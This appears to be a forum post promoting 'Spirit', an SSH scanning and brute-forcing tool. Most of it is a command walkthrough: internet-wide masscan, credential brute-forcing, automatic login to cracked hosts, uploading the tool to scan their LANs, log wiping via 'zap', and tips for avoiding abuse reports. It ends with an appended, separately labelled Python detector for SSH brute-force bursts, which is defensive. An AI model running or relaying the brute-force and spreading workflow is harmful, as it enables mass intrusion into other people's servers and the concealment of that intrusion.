SPIRIT IS THE BEST NETWORKING SCANNER AND SSH BRUTE FORCING TOOL

GBLTeam

Hello, many of you don't know about Spirit. This is a 2-year project, and currently the best networking scanner available, with a free and a paid choice! For the paid one, use code "DEFLATE" for 10% off the price.
You can also join the group: https://t.me/spiritNPT (here you can ask for anything related to Spirit)

QUICK START:
Code:
wget https://github.com/theaog/spirit/releases/download/1.30/spirit.tgz
tar xvf spirit.tgz
./spirit --help

sudo apt install masscan
cp `which masscan` .

# automatic random scanning
./spirit autobrute --ports 22

AUTOBRUTE WITH ZONES:
Code:
# Create zone.lst containing IP addresses in CIDR notation
$ cat >zone.lst<< EOF
192.168.0.0/16
172.16.0.0/12
10.0.0.0/8
EOF

# autobrute will generate collision-free (non-repeating) random ports
# scan and brute them over and over -- forever!
./spirit autobrute

Example usage for the SSH brute flow (TL;DR):
Code:
# First scan your network or the internet (check disclaimer) to acquire a list of open ports.
$ masscan \
    --rate="50000" \
    --ports "22,222,2222,2212" 0.0.0.0/0 \
    --exclude 255.255.255.255 \
    -oG open.lst
Scanning 4294967295 hosts [4 ports/host]
# masscan will create an open.lst file in oG (output Greppable) format.

# Parse this open.lst to format the data, so that spirit can understand it.
$ ./spirit parse
INFO created h.lst in HOST:PORT format

# Optional: create a filter.lst file if you want to skip certain SSH versions.
$ cat >filter.lst<< EOF
SSH-1.0
SSH-2.0-CISCO
SSH-2.0-Comware
EOF

# Grab SSH banners to make sure your target version is running on the host. NOTE: Makes a backup of h.lst to h.lst.bak
$ ./spirit banner
INFO backing up h.lst to h.lst.bak
SSH-2.0-OpenSSH_8.2p  13% [=>                  ] [11s:1m15s]
INFO created h.lst in HOST:PORT:BANNER format
$ head -n1 h.lst
100.100.100.100:2222:SSH-2.0-OpenSSH_6.6.1

# Add a password list, spirit will automatically load user:pass from a p.lst file.
# NOTE: if p.lst is not present, Spirit uses an internal passfile
$ cat > p.lst << EOF
user1:pass1
user1:pass2
user2:pass50
EOF

# Start bruting...
$ ./spirit brute
Spirit NPT (v1.30) upgrade by 24 Mar 24 00:00 UTC
HINT: Use `./spirit zap` to clean connection logs after you login via SSH
rlimit soft [1048576] hard [1048576]
INFO loaded b.lst with 26803 hosts
INFO loaded p.lst with 4881 logins
INFO randomized hosts
INFO block [true]
INFO timeout [5s]
INFO threads [1024]
[2478/4653]root:!1qwerty [77]found [33]blocked [1284]threads 20% [====>               ] [20s:1h13m36s]
Results
 |- found.ssh # Prepared SSH command
 |- found.login # Successful USER:PASS combinations
 |- found.lst # Syntax for autossh tool
 |- found.errors # SSH connection error statistics
Hosts[26803] Bruted[4000] Blocked[19803] Found[3000]

# If you want to go faster, try blocking bad hosts
./spirit brute --block=true

# Connect to all your found hosts automatically & run commands.
$ ./spirit autossh --command 'whoami && uptime'
# Upload spirit to all hosts and scan the LAN
$ ./spirit autossh --upload ./spirit --command '/tmp/spirit scan --lan'
TIP:
Code:
1. Increase your file descriptor limits: ulimit -n 65535
2. Set a proper timeout based on the network latency towards your targets: --timeout 15s
3. Adjust threads according to your network bandwidth and server resources: --threads 1500
4. Disable host blocking on LAN: --block=false
5. Inspect `found.errors` for optimization clues.
6. Use `filter.lst` to skip bad SSH versions that could get your IP reported.

Example Command:
./spirit brute --timeout 15s --threads 1500 --block=false

#NEW feature: ./spirit --tweak — configures your kernel settings w/ optimal values for scanning
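The brute flow above, seen from the other side of the connection: a single source address trying many user:pass pairs against port 22 within seconds, which is exactly the pattern that shows up in an sshd auth log. The following is an added example, not code from the Spirit project or from the original post. It parses OpenSSH-style "Failed password" lines (the sample log lines, addresses, usernames and timestamps are constructed) and flags any source that reaches a threshold of failures inside a sliding time window, so a burst like the one in the post is caught while an operator who fat-fingers a password twice is not. The regex, the year attached to the year-less syslog timestamps and the 5-failures-in-60-seconds threshold are all assumptions of this example.

```python
"""Detect SSH brute-force bursts in sshd auth log lines.

Added example (not part of the Spirit project or the original post). Log
lines below are constructed to resemble OpenSSH syslog output; addresses,
usernames and timestamps are made up.
"""
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH logs a failed password attempt as e.g.
#   Mar 24 00:00:03 host sshd[1234]: Failed password for invalid user admin from 203.0.113.7 port 40122 ssh2
# Timestamps lack a year, so an assumed one is attached while parsing.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

ASSUMED_YEAR = 2024  # assumption: syslog timestamps carry no year


def parse_failed_logins(lines, year=ASSUMED_YEAR):
    """Return a list of (timestamp, source_ip, username) for failed password lines."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"]))
    return events


def find_bruteforce_sources(events, window_seconds=60, threshold=5):
    """Flag source IPs with >= threshold failures inside any window_seconds span.

    A sliding window per source means a slow trickle of failures spread
    over hours stays below the threshold while a burst is flagged.
    Returns {ip: {"failures": n, "distinct_users": k}} for flagged sources.
    """
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # shrink the window from the left until it spans <= window_seconds
            while (attempts[end][0] - attempts[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {
                    "failures": len(attempts),
                    "distinct_users": len({u for _, u in attempts}),
                }
                break
    return flagged


# Constructed sample: one bursting source and one legitimate user with two
# failed attempts minutes apart.
SAMPLE_LOG = """\
Mar 24 00:00:01 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 40122 ssh2
Mar 24 00:00:02 bastion sshd[2102]: Failed password for root from 203.0.113.7 port 40123 ssh2
Mar 24 00:00:02 bastion sshd[2103]: Failed password for invalid user user1 from 203.0.113.7 port 40124 ssh2
Mar 24 00:00:03 bastion sshd[2104]: Failed password for root from 203.0.113.7 port 40125 ssh2
Mar 24 00:00:04 bastion sshd[2105]: Failed password for invalid user pi from 203.0.113.7 port 40126 ssh2
Mar 24 00:00:05 bastion sshd[2106]: Accepted publickey for ops from 198.51.100.4 port 50210 ssh2
Mar 24 00:03:10 bastion sshd[2110]: Failed password for ops from 198.51.100.4 port 50211 ssh2
Mar 24 00:09:45 bastion sshd[2115]: Failed password for ops from 198.51.100.4 port 50212 ssh2
""".splitlines()


def analyze(lines=SAMPLE_LOG):
    """Run the parser and the window check over a list of log lines."""
    return find_bruteforce_sources(parse_failed_logins(lines))


if __name__ == "__main__":
    for ip, info in analyze().items():
        print(f"{ip}: {info['failures']} failures, {info['distinct_users']} usernames")
```

On a real host, feed it `journalctl -u ssh` or `/var/log/auth.log` output instead of the constructed sample; the distinct-user count separates a dictionary attack against one account from a user:pass spray like the p.lst in the post, which is worth reporting differently.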